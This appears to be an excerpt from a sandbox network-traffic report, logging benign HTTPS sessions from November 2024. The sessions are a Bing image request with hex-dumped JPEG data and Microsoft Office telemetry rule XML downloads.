Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-23 06:09:25 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-23 06:09:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49749	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:25 UTC	375	OUT	GET /th?id=OADD2.10239357296555_1NQZO136EN197N4N8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:25 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 762590 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: FC4BA032D43E4058B0671DEB79C59034 Ref B: EWR30EDGE0107 Ref C: 2024-11-23T06:09:25Z Date: Sat, 23 Nov 2024 06:09:24 GMT Connection: close
2024-11-23 06:09:25 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 32 32 3a 31 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:22:188C
2024-11-23 06:09:25 UTC	16384	IN	Data Raw: 00 1e af 27 1b 87 9e 1e 7c b4 f6 6f b8 b6 39 9d 7e d2 2f 0a 78 9e d3 c6 1e 18 b2 86 58 ed 42 49 14 5a 84 c9 77 f6 bf bd f3 a4 29 fe a9 3d 3c cf e2 ab 32 78 6b c4 3f 15 f5 89 7c 5f a3 69 56 80 43 75 0d bd d5 82 87 68 ec bc b1 8f de 27 1b 81 ff 00 be ba d7 11 e2 0b c9 b4 ff 00 1d 49 a9 47 a5 4f 63 6f 25 d7 fa 4c 3f c1 f3 7f cb 34 7f e5 5e bf f0 77 50 d2 85 be a7 aa cf a2 eb d1 5c 6b 13 4f 24 b7 d3 43 fb 98 20 db fe b2 19 02 ee f3 fe fa 7c ab fc 75 58 cf 69 85 a1 1a d1 fe 25 ac 9f 97 67 a9 d3 46 8b 9f bb 23 93 f1 16 91 6b e1 0f 19 5b 69 f6 1a d7 da ec 74 d6 8c ee d4 2d 0d bd bd de e7 f3 3e 51 f7 d2 3f ef 2d 65 6b de 33 f3 3c 4b a8 09 2c c7 8a 6f 35 69 12 3b 5b bb a8 4c 5e 49 63 f3 79 49 fe d5 7a 37 c4 ef 03 f8 56 4f 06 cd 36 99 37 d9 25 97 50 4f b2 db 5f cf Data Ascii: '\|o9~/xXBIZw)=<2xk?\|_iVCuh'IGOco%L?4^wP\kO$C \|uXi%gF#k[it->Q?-ek3<K,o5i;[L^IcyIz7VO67%PO_
2024-11-23 06:09:25 UTC	16384	IN	Data Raw: 70 4f 71 8d 0e c8 dc cd 72 12 39 65 b9 1f eb 0a 7c ed f2 b5 3f c5 7e 22 d4 ac ed e2 d3 12 48 ac 44 7f bc 92 da d7 67 fa c7 fe ff 00 ff 00 13 5e b5 4a 95 6a 72 c7 96 cf d4 e2 9c e6 fd d3 d7 34 1f 0d 68 da ae 8d 16 bd e2 7f 88 5a 94 69 75 2f 99 7f f7 2e 36 4f b3 74 73 7c ad f9 ef 1b ea 4f 05 eb be 22 d3 35 cb ad 5e df c4 30 df 5a 5a cb e6 45 aa 45 bf f7 ff 00 c3 b7 f8 5b 6d 79 b6 bf 6d 69 15 ec 97 7a 74 e7 ed 16 f6 df e9 52 5d 40 91 2a 3b 6d dd ba 35 fe 1a d7 f0 fe a7 65 6d a3 c5 04 90 f9 51 dd 45 e5 cb 17 dc 8b fd fa f9 6c 4e 0f 9a 9b e6 97 32 7d 2c b4 3d 1e 7e 53 b8 f8 a1 ab 5b ea 3e 06 33 dc 59 4d 75 6f a6 c5 e6 79 5f da 53 6c 8e 51 f2 ef f9 be 56 af 3c f0 c4 e2 ef 4b 96 79 3f 75 6f 14 49 fb df 27 cd 78 f7 7f 07 ca df 75 ab be bc 4d 39 f4 bb 54 bf 82 cf Data Ascii: pOqr9e\|?~"HDg^Jjr4hZiu/.6Ots\|O"5^0ZZEE[mymiztR]@*;m5emQElN2},=~S[>3YMuoy_SlQV<Ky?uoI'xuM9T
2024-11-23 06:09:25 UTC	16384	IN	Data Raw: f9 76 3a ff 00 2a d8 b7 d7 6c b5 af 12 cb 6f 6f 0d 9c 92 49 6d e6 49 16 a1 f2 37 fb 31 d7 2d a8 69 1e 1f 9b 54 97 4a fb 74 f0 da 4b 1f ee 63 ff 00 5b e4 3f fd 36 6a e0 a0 94 97 25 48 f2 ff 00 5a 8c d4 b3 d6 ee 1a f2 2d 6d 3f d1 64 f2 9e e6 2f 36 1f 92 7d df dd 6a e5 7c 5a 2d f5 a9 a5 bd 4b df ec c9 e5 fd e7 d9 65 87 ef b7 f7 e2 6f f9 e7 5e 91 a1 e9 5a 33 f8 6f fb 32 3b db 3f 2e da 24 f2 ae 65 fb 9b bf 89 de 3f f6 ab 98 f8 a9 7a 9a 6d 84 56 f2 4d 67 75 79 73 fb b8 ff 00 73 fe 91 6e ab f7 bf 79 fe 76 d5 e0 eb 53 fa cb 8d 38 eb b7 c8 5c 8c d1 f8 5b 8b cd 37 f7 f0 43 e6 5b 44 91 c5 e5 6f 4f 33 6f f1 b7 f7 eb 33 c6 16 72 db e8 39 10 43 15 c4 52 fe f6 59 7f e5 ed 5d ff 00 e5 b2 7f 72 b4 74 5f 09 f8 87 44 fd e6 9b 7d 67 f6 7b 58 bf 7b 2d d4 db 7c fd ff 00 36 df Data Ascii: v:*looImI71-iTJtKc[?6j%HZ-m?d/6}j\|Z-Keo^Z3o2;?.$e?zmVMguyssnyvS8\[7C[DoO3o3r9CRY]rt_D}g{X{-\|6
2024-11-23 06:09:25 UTC	16384	IN	Data Raw: cf 0a 5f 5f 45 a9 ea 76 33 5a ea 1e 57 99 e5 43 0e c8 7f e0 49 5e 85 2c ff 00 0c e5 cb 52 95 8c 3f b2 61 f6 64 70 de 07 6d 45 74 db a1 e3 5f b6 49 e7 44 97 36 b2 fd 8e 17 b8 9f f8 55 a3 3f 7d 79 fe f5 63 6b 1e 00 8a da 69 6c a4 82 6b f8 2f a2 fb 45 b5 f5 ac df 73 fe ba 3b 2f f7 ff 00 86 bd 4a f3 41 d2 74 4f 0f dd 6a 76 9e 22 9a ea e2 2f de 5a fd cd 89 fe cf f9 f9 ab 0a c6 e6 6b cb 4d fa 90 86 3f b7 4b e5 cb fb ed bf 64 97 fb ea df c1 be b9 e9 e6 13 75 25 56 87 c3 f7 7e 06 15 b0 b0 81 e0 36 fe 18 d4 af 6f 25 92 d3 45 98 db c7 2f 96 4c 41 f6 fe 75 72 f7 c2 37 30 4c 6c ee ec a6 b5 bb 8e 2f 33 ca 97 ef ff 00 c0 ab d5 2f 34 8f 18 e8 0f 2c ba 2c d3 5f 5f f7 ba be 9b e7 fe f7 fb bb 7f de ac 7d 53 5e d3 62 f0 3c ba 44 1a 25 9e b1 aa 6a 7f bc be d5 25 de ff 00 67 Data Ascii: __Ev3ZWCI^,R?adpmEt_ID6U?}yckilk/Es;/JAtOjv"/ZkM?Kdu%V~6o%E/LAur70Ll/3/4,,__}S^b<D%j%g
2024-11-23 06:09:25 UTC	16384	IN	Data Raw: 49 db d7 64 8f 33 93 9d cb 96 3f f0 4e 5a ef 45 d4 b5 9f 85 3e 07 b8 5f 0f e9 9a 94 90 db 4f e6 46 26 4f 3a 7f 36 e5 fc bf 32 08 f9 ff 00 65 5d ab b3 f0 2f c2 3b 79 34 0b 6b d3 0c da 3f d9 8f ee bc dd 92 ff 00 e4 5f ee fa d5 df 88 da 2e b1 e1 fb 32 9e 0a d2 f4 7b 5d 3f ed 5f 62 86 51 37 cf f6 58 d3 7f ef 76 fc db 99 ba c9 5b ba 0f 86 7e 21 ea 36 ff 00 d9 91 f8 8a 68 5e 18 a0 8e 58 cc 3b 21 f3 5b fe 78 6d f9 fe 7f f6 be 56 fb d9 af 1b 1f 8e c4 d4 a7 fb 9a 91 8c 5b f9 9d 94 f0 bc 93 f8 6f a1 d6 68 72 c7 0d 95 d6 9f 71 a5 43 15 9d af fa a9 61 ff 00 5d 1f fb 7f 27 fa c5 ff 00 6a a6 f1 26 a7 e5 69 bf 6f 8e 09 a3 b4 d5 2e 92 ca 5d 53 f7 d0 f9 8c df c2 db 97 ef 7f 76 a7 f0 6f 87 7f b4 fc 33 a8 26 a7 aa 4d 73 3d af 97 6d f6 ff 00 f8 f7 bb fb 54 6f fc 2a bf dc 6e Data Ascii: Id3?NZE>_OF&O:62e]/;y4k?_.2{]?_bQ7Xv[~!6h^X;![xmV[ohrqCa]'j&io.]Svo3&Ms=mTo*n
2024-11-23 06:09:25 UTC	16384	IN	Data Raw: fa 7f 85 ed 7f b7 e0 b3 bd bf d3 8c 37 5f bb b6 97 cd d8 06 d7 db e7 4d fc 49 de bd 36 d7 c0 1a ff 00 83 74 cd 37 58 b2 9e 6b 90 2f 23 b8 b9 97 4d b3 53 15 9a 97 d9 ba e2 41 93 0a 6c ff 00 be bb d2 7c 28 f0 2d be 87 f1 03 4a b0 bb f0 e4 3a dc 1a 95 ae fb 69 75 5c a5 8d c4 e8 fb b7 45 24 5f 34 d1 7f e3 df de 1b 6b ae f1 f7 80 e5 f0 fe bd 24 27 45 86 57 d4 fc e8 bc 91 ae ec d5 6f bc df bc d1 79 7b d7 c8 fe e2 cc df ef 51 8c cc 54 f1 31 a3 ed 34 b5 fa 7b df 89 bd 2a 5c f3 f7 8f 2a f8 85 af e9 5e 23 f1 95 bd a5 a6 bf 34 62 ca f9 c5 85 fe a1 33 ca a2 d5 ba 44 ff 00 ee ff 00 8d 6c 78 43 51 b8 f0 de 8d 7d 26 99 ad 5e 6c b7 b6 79 0d 8c b9 4d 8b ff 00 3d bf 77 fc 2b fc 31 b5 5f b1 f8 31 ae ea 77 b1 e8 7a cf 87 fc 49 63 a6 bd 93 dc 58 3d 86 81 17 98 b3 a2 7d c9 37 Data Ascii: 7_MI6t7Xk/#MSAl\|(-J:iu\E$_4k$'EWoy{QT14{\^#4b3DlxCQ}&^lyM=w+1_1wzIcX=}7
2024-11-23 06:09:26 UTC	16065	IN	Data Raw: 73 c0 5e 35 8e c3 50 fe c6 b4 b2 b3 8a c0 cd fb af 3b 77 2b bf e5 f3 ff 00 bf 8f fb e9 7f 86 b8 31 98 29 4e 8c 6a f2 fe f2 3b 6b b1 5c dc a5 4f 8c 1f 0c 2e 3c 1f a7 47 ab 59 4d 2d d6 99 2d d7 95 e6 4b 10 49 60 f9 43 27 98 83 d7 e7 c3 7d d6 d9 c5 79 c5 7d 0b f1 1b c5 be 21 f0 ce a3 2e a7 aa 79 1a b6 99 ab cc f1 9d 34 da 3f d8 67 fb ac ff 00 7f ee 3f ff 00 b4 b5 e2 3e 32 1a 7c 7e 26 bb 3a 64 13 c5 6b e6 e6 3b 6b b8 b6 cd 07 fd 32 3f ee d7 7e 53 89 c4 54 a2 bd be af bf 72 d1 a7 a4 ea 96 e7 c2 77 5a 4d d6 98 6f 2f 25 97 fd 17 11 73 03 7f 9f e1 ab 9a 87 f6 75 bf 81 e4 86 c7 c4 10 cd 27 c8 66 b4 90 63 67 f1 7c 99 fb f5 c7 c7 3c d0 ff 00 ab 9b cb ff 00 96 94 cc f1 be 4f f9 6b 5d 92 c3 2e 6f 9d c9 f6 66 fe 9d ab 6a b7 1a 5d a6 8f 15 f5 e4 76 f1 cb e6 79 5f 79 23 Data Ascii: s^5P;w+1)Nj;k\O.<GYM--KI`C'}y}!.y4?g?>2\|~&:dk;k2?~STrwZMo/%su'fcg\|<Ok].ofj]vy_y#
2024-11-23 06:09:26 UTC	16384	IN	Data Raw: 4b a4 78 b7 51 f1 2e 87 7e de 20 d5 34 f9 24 ba b0 09 2f f6 86 a5 b2 6b ad af f2 ec f9 76 a6 36 7d ca fa 4a b2 c4 4e 12 b4 53 5b 79 fd de 86 64 df 11 bc 1b aa 5d 69 b2 dd c1 ae 69 f7 f7 f2 c9 e5 ea 5e 4c 09 12 c7 1a a7 99 ba 69 dd 53 f7 8b fc 5f de af 32 b2 ba d4 3c 3f aa 44 fe 54 b0 cf 1f 97 24 52 1c ee db f7 97 6f b1 af 5e b1 d3 be 15 c7 e1 39 35 3b 9f 10 eb be 28 d6 ae 65 8d e3 8e d8 16 b8 83 62 e6 49 19 1b e5 d9 fc 3f 3d 6a ea 96 fe 16 d5 b4 bb bb cd 57 c1 97 92 45 1c 89 f6 69 6d 22 9a 5e 22 fe 08 e7 fb 9e 5e cf ef ff 00 3a c2 96 3f d8 c5 53 9c 5c a3 b6 d6 fc 3b 0d 44 dc f0 7e ad e1 8d 42 6d 2f 5e d3 ef 66 fb 74 52 bc 9a a5 f5 a4 31 45 71 e4 4e fb 84 1e 57 dd f3 19 da 48 97 e5 fb bf 35 75 07 47 d6 61 9b 58 48 27 86 61 75 be e2 d6 eb ed 9f 68 9a 44 6f Data Ascii: KxQ.~ 4$/kv6}JNS[yd]ii^LiS_2<?DT$Ro^95;(ebI?=jWEim"^"^:?S\;D~Bm/^ftR1EqNWH5uGaXH'auhDo
2024-11-23 06:09:26 UTC	16384	IN	Data Raw: 5f f5 b5 bd 39 2b 04 26 68 c3 a5 dd 68 ba c4 9a 5e 9a d6 53 49 24 69 27 db fc ef dd 3a ff 00 d3 39 3a 6d a4 f0 a7 89 35 1f 09 6a 97 51 ac 06 3b f1 27 97 2f ef 7f f4 0f f6 ab bc f8 71 e0 fd 2a db 47 ba bc f1 7f f6 94 36 fe 5f 99 16 21 4f fb 68 b2 46 ad f2 c9 fe cb 6d f9 7f da ad 5f 15 f8 43 46 f1 26 8b 6b 67 e1 1d 10 e9 f7 f7 41 2f 2d 65 ba 9b e4 b8 89 93 f7 92 ae ec 9d 81 6b cc a9 8c a3 52 a4 a9 4e 37 8f 57 d0 be 43 1b c4 1e 23 f1 5e b1 3c 5a fe a1 a5 cd 75 f6 5d 9e 57 dc dd e5 7f b7 27 f1 b7 fb 75 c9 78 bf 52 b8 fe df d4 52 e1 af 24 fb 4c be 5f 99 f2 26 77 7f 0c 89 fd ef f7 6b da 3e 19 f8 33 e1 d5 cc da 54 7a c7 c5 4d 53 ec 7e 6f 97 fd 9f 2f 87 e6 86 6f 2b 66 ef dd 34 7e 62 ff 00 bd 5e 93 f1 07 e1 17 c3 6f 0c 68 bf da fa a7 8a 35 3b 7d 1e ff 00 64 9f 6f Data Ascii: _9+&hh^SI$i':9:m5jQ;'/q*G6_!OhFm_CF&kgA/-ekRN7WC#^<Zu]W'uxRR$L_&wk>3TzMS~o/o+f4~b^oh5;}do

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.6	49754	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:25 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:25 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060925Z-178bfbc474btrnf9hC1NYCb80g00000004800000000063p6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:25 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.6	49752	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:25 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:25 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 3e1ce11e-901e-00ac-5292-3bb69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060925Z-15b8b599d882hxlwhC1TEBfa5w00000002b000000000excu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:25 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.6	49753	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:25 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:25 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: ad60cd0f-c01e-008e-6f6a-3c7381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060925Z-174c587ffdfb74xqhC1TEBhabc00000002eg00000000k7mk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:25 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.6	49750	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:25 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:25 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060925Z-174c587ffdfks6tlhC1TEBeza400000002fg00000000pkbh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:25 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.6	49751	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:25 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:25 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 9bcae678-901e-007b-2946-3cac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060925Z-178bfbc474bpscmfhC1NYCfc2c00000002h000000000nr34 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:25 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49756	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
